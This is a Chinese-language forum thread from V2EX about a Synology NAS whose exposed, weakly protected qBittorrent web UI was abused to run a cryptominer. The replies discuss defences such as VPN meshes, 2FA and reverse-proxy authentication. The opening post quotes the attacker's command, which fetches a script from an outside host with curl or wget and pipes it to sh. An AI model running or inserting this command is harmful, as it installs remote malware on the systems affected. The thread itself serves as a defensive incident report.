Home Sign Up Sign In
请不要把任何和邀请码有关的内容发到 NAS 节点。

邀请码相关的内容请使用 /go/in 节点。

如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
hiyoi
V2EX  ›  NAS

记一次群晖开 qbittorrent 被植入挖矿代码

  •   
  •   hiyoi · Jun 9, 2025 · 3813 views
    This topic created in 344 days ago, the information mentioned may be changed or developed.
    起因:
    偶然发现群晖 cpu 内存占用率很高。

    查看进程发现有个进程以 qbittornet 用户运行这一个 名叫./PHsyYPRT 进程,名字很古怪,占了 2 核 cpu ,30%内存。

    起初怀疑是 qbit 问题,马上停止套件,进程消失。 但是又过了几天,又发现相同的进程。 一顿搜索

    参考:
    https://www.reddit.com/r/synology/comments/1co3toi/rogue_process_eating_ram/?tl=zh-hans

    发现攻击者可以在 web ui, 设置 torrent 下载完成时执行外部程序:
    sh -c "(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"

    考虑到之前 web ui 曾开到公网过,且用了弱密码。被轻易爆破的可能性很大。

    赶紧把 web ui 公网关掉。
  • 挖矿
  • qbit
  • webui
    22 replies    2025-06-11 23:38:07 +08:00
    ererrrr
        1
    ererrrr  
       Jun 9, 2025
    要用组网呀
    guanzhangzhang
        2
    guanzhangzhang  
       Jun 9, 2025
    异地组成局域网,就没这么多事情了,三层都是通的,而不是映射端口啥的
    needhourger
        3
    needhourger  
       Jun 9, 2025   ❤️ 5
    弱密码公开到公网啊,那没事了😅
    justNoBody
        4
    justNoBody  
       Jun 9, 2025
    谢谢分享
    vpsvps
        5
    vpsvps  
       Jun 9, 2025
    qbittorrent 套件源有问题吧
    bao3
        6
    bao3  
       Jun 9, 2025
    tailscale ,headscale ,wireguard 等等,大家讨论异地组网就是为了家庭服务不用公网公开。
    yazinnnn0
        7
    yazinnnn0  
       Jun 9, 2025
    用 ssh -L 4000:127.0.0.1:4000 之类的办法把端口转发到本机啊... 随便一个应用就放公网太危险了
    hiyoi
        8
    hiyoi  
    OP
       Jun 9, 2025 via Android
    @vpsvps 应该不是,用的矿神群晖 spk 源下的 qbit 套件版,如果有问题应该早就爆出来了
    hiyoi
        9
    hiyoi  
    OP
       Jun 9, 2025 via Android   ❤️ 1
    再不敢轻易放服务到公网了
    JensenQian
        10
    JensenQian  
       Jun 9, 2025
    JensenQian
        11
    JensenQian  
       Jun 9, 2025
    xiaozhubin
        12
    xiaozhubin  
       Jun 10, 2025
    之前群晖安了个 qb, 也是映射外网了,有次突然发现下载列表里出现了一个我从未下载过的资源,就把外网关了,现在只在内网用了。
    hiyoi
        13
    hiyoi  
    OP
       Jun 10, 2025 via Android
    @xiaozhubin 对公的服务最好是带 2FA 的。我还开着一个 vaultwarden ,开着 2FA ,一直稳定运行。
    montaro2017
        14
    montaro2017  
       Jun 10, 2025
    @JensenQian #11 真能搜到啊
    okzy520
        15
    okzy520  
       Jun 10, 2025 via iPhone
    我也是发现 qbit 认证太简单了 就把外网给关了
    之后就用 zerotier 了 个人自建的要是不支持 2FA 最好别往外放
    pcloves
        16
    pcloves  
       Jun 10, 2025
    @hiyoi 话说这个 qbit 怎么开 2FA 啊?
    anjing01
        17
    anjing01  
       Jun 10, 2025
    前面加个 APACHE/NGINX ,配置个 BasicAuth 认证+限制国外 IP 访问(甚至只允许你所在省份 IP 访问)+ 访问日志 403 的 IP 地址 ipset 加入 blocklist ,基本上没啥问题(服务器带外需要 WEB 放出来);
    WG 也用,不过那个主要是给外部访问 SAMBA 共享、远程桌面用的;
    obeykarma
        18
    obeykarma  
       Jun 10, 2025
    我套了 HTTPS 直接对公网,改了用户名和密码

    应该没什么安全隐患,最多扫端口发现我在用 qb 了
    hiyoi
        19
    hiyoi  
    OP
       Jun 10, 2025 via Android
    @obeykarma 用强密码就没事
    okzy520
        20
    okzy520  
       Jun 11, 2025
    @pcloves qbit 就没这个能力 别想了
    官方论坛上有个帖子解释的 大意什么服务能开放到什么程序是有条件的 用户应该自己评估
    不过 qbit 自己的做法已经是在变相告诉你 仅限内网使用了
    starrys
        21
    starrys  
       Jun 11, 2025
    @hiyoi #19 真是带不动你。楼上那么多人说要组网、防火墙控制,感觉你都没听进去,仍然觉得设置 2FA 、强密码就可以了,这样虽然安全程度有所提升,但还不够的,原因是“应用程序可能存在未知的漏洞导致你的主机被攻破”。
    hiyoi
        22
    hiyoi  
    OP
       Jun 11, 2025 via Android
    @starrys 你要这么说,那就没有什么应用程序是绝对的安全。 强密码+2FA 是现在公认的比较安全的方案。

    btw ,我已经把 qbit web ui 端口转发公网关了。
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   1050 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 56ms · UTC 22:47 · PVG 06:47 · LAX 15:47 · JFK 18:47
    ♥ Do have faith in what you're doing.